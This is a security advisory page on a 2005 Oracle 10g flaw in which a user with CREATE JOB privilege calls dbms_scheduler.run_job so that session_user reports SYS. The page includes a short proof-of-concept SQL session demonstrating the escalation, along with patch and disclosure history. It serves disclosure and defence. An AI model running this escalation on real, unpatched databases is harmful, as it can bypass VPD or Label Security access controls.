Oracle 10g Exploit dbms_scheduler SESSION

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Blog
Contact
People
Partner
Impressum
Sitemap

DBMS_SCHEDULER SESSION_USER issue in Oracle 10g

Name	DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected	Oracle 10g
Severity	Medium Risk
Category	Switch Oracle Username to user SYS
Vendor URL	http://www.oracle.com/
Credit	Oracle Metalink Forum 633336.995
Exploit	Forum Entry removed by Oracle
Date	07 May 2005 (V 1.02)
VU#	176909

Details

The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.

Example
Connect as a user with CREATE job privilege

SQL> select user from dual;

USER
---------
JOBUSER

SQL> execute dbms_scheduler.run_job('ANY_JOB');

PL/SQL procedure successfully completed.

SQL> select user from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','session_user')) from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','current_user')) from dual;

USER
---------
JOBUSER

SQL> show user

USER is "jobuser"

Patch Information
Apply the patches for Oracle Critical Patch Update October 2005.

History
05-may-2005 US CERT VU# added (V1.01)
07-may-2005 Oracle removed the forum entry from Metalink (V1.02)
18-oct-2005 Oracle released CPU October 2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.